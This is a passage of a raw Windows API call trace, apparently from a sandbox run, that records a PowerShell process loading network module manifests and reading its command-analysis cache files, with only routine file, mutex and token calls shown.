ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.535] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e69e26be-07c1-43c1-a121-16bf37e9dfce", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e69e26be-07c1-43c1-a121-16bf37e9dfce", lpFilePart=0x0) returned 0x93 [0282.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.535] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e69e26be-07c1-43c1-a121-16bf37e9dfce" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_e69e26be-07c1-43c1-a121-16bf37e9dfce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa48 [0282.536] GetFileType (hFile=0xa48) returned 0x1 [0282.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.536] GetFileType (hFile=0xa48) returned 0x1 [0282.536] ReadFile (in: hFile=0xa48, lpBuffer=0x25b5c8002e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c8002e8*, lpNumberOfBytesRead=0x653ef8d338*=0x73b, lpOverlapped=0x0) returned 1 [0282.539] ReadFile (in: hFile=0xa48, lpBuffer=0x25b5c8002e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c8002e8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.539] CloseHandle (hObject=0xa48) returned 1 [0282.539] ReleaseMutex (hMutex=0xa44) returned 1 [0282.540] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45 [0282.540] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.540] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.540] CoTaskMemFree (pv=0x25b73d00e00) [0282.540] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfcc20 [0282.540] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfcc20 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.540] CoTaskMemFree (pv=0x25b73cfcc20) [0282.540] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.540] GetCurrentProcess () returned 0xffffffffffffffff [0282.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa48) returned 1 [0282.540] GetTokenInformation (in: TokenHandle=0xa48, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.541] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73985070 [0282.541] GetTokenInformation (in: TokenHandle=0xa48, TokenInformationClass=0x1, TokenInformation=0x25b73985070, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73985070, ReturnLength=0x653ef8d6b8) returned 1 [0282.541] LocalFree (hMem=0x25b73985070) returned 0x0 [0282.541] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c805158, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c805158*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.542] CreateMutexW (lpMutexAttributes=0x25b5c8052a8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa4c [0282.542] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa4c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.542] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01020 [0282.542] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01020, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.542] CoTaskMemFree (pv=0x25b73d01020) [0282.542] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45 [0282.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.543] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c8058e8 | out: lpFileInformation=0x25b5c8058e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289)) returned 1 [0282.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.543] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.543] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.543] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_3d1401c3-d649-4da7-a8d7-ab9b94ec3e93", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_3d1401c3-d649-4da7-a8d7-ab9b94ec3e93", lpFilePart=0x0) returned 0x93 [0282.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.543] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_3d1401c3-d649-4da7-a8d7-ab9b94ec3e93" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_3d1401c3-d649-4da7-a8d7-ab9b94ec3e93"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa50 [0282.544] GetFileType (hFile=0xa50) returned 0x1 [0282.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.544] GetFileType (hFile=0xa50) returned 0x1 [0282.544] ReadFile (in: hFile=0xa50, lpBuffer=0x25b5c806b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c806b60*, lpNumberOfBytesRead=0x653ef8d338*=0x386, lpOverlapped=0x0) returned 1 [0282.546] ReadFile (in: hFile=0xa50, lpBuffer=0x25b5c806b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c806b60*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.546] CloseHandle (hObject=0xa50) returned 1 [0282.547] ReleaseMutex (hMutex=0xa4c) returned 1 [0282.547] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f [0282.547] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cffae0 [0282.547] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cffae0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.547] CoTaskMemFree (pv=0x25b73cffae0) [0282.547] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0282.547] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.548] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.548] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.548] GetCurrentProcess () returned 0xffffffffffffffff [0282.548] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa50) returned 1 [0282.548] GetTokenInformation (in: TokenHandle=0xa50, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.548] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739847f0 [0282.548] GetTokenInformation (in: TokenHandle=0xa50, TokenInformationClass=0x1, TokenInformation=0x25b739847f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739847f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.549] LocalFree (hMem=0x25b739847f0) returned 0x0 [0282.549] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c80add0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c80add0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.549] CreateMutexW (lpMutexAttributes=0x25b5c80af20, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa54 [0282.549] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa54, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.550] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.550] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.550] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.550] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f [0282.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.550] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c80b578 | out: lpFileInformation=0x25b5c80b578*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1)) returned 1 [0282.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.550] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.550] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.551] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e5890857-b2cb-49e5-ab9a-ea2b67c2b24c", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e5890857-b2cb-49e5-ab9a-ea2b67c2b24c", lpFilePart=0x0) returned 0x93 [0282.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.551] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e5890857-b2cb-49e5-ab9a-ea2b67c2b24c" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_e5890857-b2cb-49e5-ab9a-ea2b67c2b24c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa58 [0282.551] GetFileType (hFile=0xa58) returned 0x1 [0282.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.551] GetFileType (hFile=0xa58) returned 0x1 [0282.551] ReadFile (in: hFile=0xa58, lpBuffer=0x25b5c80c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c80c810*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.555] ReadFile (in: hFile=0xa58, lpBuffer=0x25b5c80e615, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x653ef8cf68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c80e615*, lpNumberOfBytesRead=0x653ef8cf68*=0x8, lpOverlapped=0x0) returned 1 [0282.555] ReadFile (in: hFile=0xa58, lpBuffer=0x25b5c80c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c80c810*, lpNumberOfBytesRead=0x653ef8d008*=0x1000, lpOverlapped=0x0) returned 1 [0282.556] ReadFile (in: hFile=0xa58, lpBuffer=0x25b5c80c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c80c810*, lpNumberOfBytesRead=0x653ef8d008*=0x6a7, lpOverlapped=0x0) returned 1 [0282.557] ReadFile (in: hFile=0xa58, lpBuffer=0x25b5c80c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c80c810*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.557] CloseHandle (hObject=0xa58) returned 1 [0282.557] ReleaseMutex (hMutex=0xa54) returned 1 [0282.557] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53 [0282.557] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.557] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.557] CoTaskMemFree (pv=0x25b73d007a0) [0282.557] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0282.557] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.557] CoTaskMemFree (pv=0x25b73cfdf40) [0282.557] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.558] GetCurrentProcess () returned 0xffffffffffffffff [0282.558] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa58) returned 1 [0282.558] GetTokenInformation (in: TokenHandle=0xa58, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.558] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739847b0 [0282.558] GetTokenInformation (in: TokenHandle=0xa58, TokenInformationClass=0x1, TokenInformation=0x25b739847b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739847b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.559] LocalFree (hMem=0x25b739847b0) returned 0x0 [0282.559] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c8177f8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c8177f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.559] CreateMutexW (lpMutexAttributes=0x25b5c817948, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa5c [0282.559] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa5c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.559] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.559] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.559] CoTaskMemFree (pv=0x25b73d007a0) [0282.560] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53 [0282.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.560] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c817fa8 | out: lpFileInformation=0x25b5c817fa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1 [0282.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.560] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.560] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.560] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9f3d095c-04b8-43e4-827c-ea955591301c", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9f3d095c-04b8-43e4-827c-ea955591301c", lpFilePart=0x0) returned 0x93 [0282.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.561] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9f3d095c-04b8-43e4-827c-ea955591301c" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_9f3d095c-04b8-43e4-827c-ea955591301c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa60 [0282.561] GetFileType (hFile=0xa60) returned 0x1 [0282.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.561] GetFileType (hFile=0xa60) returned 0x1 [0282.561] ReadFile (in: hFile=0xa60, lpBuffer=0x25b5c819248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c819248*, lpNumberOfBytesRead=0x653ef8d338*=0x4d7, lpOverlapped=0x0) returned 1 [0282.563] ReadFile (in: hFile=0xa60, lpBuffer=0x25b5c819248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c819248*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.563] CloseHandle (hObject=0xa60) returned 1 [0282.564] ReleaseMutex (hMutex=0xa5c) returned 1 [0282.564] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49 [0282.564] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.564] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 